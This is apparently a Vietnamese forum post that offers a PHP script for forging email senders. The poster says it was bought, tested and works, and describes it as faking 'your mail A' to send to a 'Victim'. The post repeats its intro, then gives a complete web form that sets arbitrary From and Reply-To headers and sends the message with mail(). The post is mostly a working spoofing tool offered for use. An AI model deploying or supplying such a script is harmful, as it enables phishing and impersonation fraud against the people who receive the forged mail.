Ai cần thì tạo file .php ví dụ index.php và paste code dưới vào và lưu lại nhé
Còn không cần đừng ném gạch
Hàng này tí cáo tự buy = paypal .
Và đã test , Oke 100% .
Chức năng .
Giả mạo email .
Ví dụ mail bạn là mail A .
Code sẽ fake mail A của bạn và send cho Victim
Rất thích hợp cho việc ( chưa rõ )
Anh em nào cần thì code đây Còn không cần đừng ném gạch
Hàng này tí cáo tự buy = paypal .
Và đã test , Oke 100% .
Chức năng .
Giả mạo email .
Ví dụ mail bạn là mail A .
Code sẽ fake mail A của bạn và send cho Victim
Rất thích hợp cho việc ( chưa rõ )
<?php
if ($_POST["submit"]=="submit") {
$fromemail= $_POST["fromemail"];
$fromname= $_POST["fromname"];
$to = $_POST["toemail"];
$subject = $_POST["xsubject"];
$message = $_POST["xmessage"];
$headers = 'From: '.$fromname.'<'.$fromemail. ">\r\n" .
'Reply-To: '.$fromname.' <'.$fromemail. ">\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
$messagetoshow="<h2 align=center>Your message has been sent!</h2>";
}
?>
<form method="post">
<table align="center" width="500" style="border:2px #a5f3ed dotted;font-family:arial" cellspacing="10">
<tr>
<td colspan="2">
<?=$messagetoshow?>
<h4 align="center">Enter the details below and press submit to send your email:</h4>
</td>
</tr>
<tr>
<td>
From Name
</td>
<td>
<input type="text" name="fromname">
</td>
</tr>
<tr>
<td>
From Email
</td>
<td>
<input type="text" name="fromemail">
</td>
</tr>
<tr>
<td>
To Email
</td>
<td>
<input type="text" name="toemail">
</td>
</tr>
<tr>
<td>
Subject
</td>
<td>
<input type="text" name="xsubject">
</td>
</tr>
<tr>
<td>
Message
</td>
<td>
<textarea name="xmessage"></textarea>
</td>
</tr>
<tr>
<td colspan="2">
<input type="submit" name="submit" value="submit">
</td>
</tr>
</table>
Thanks nào.........Guest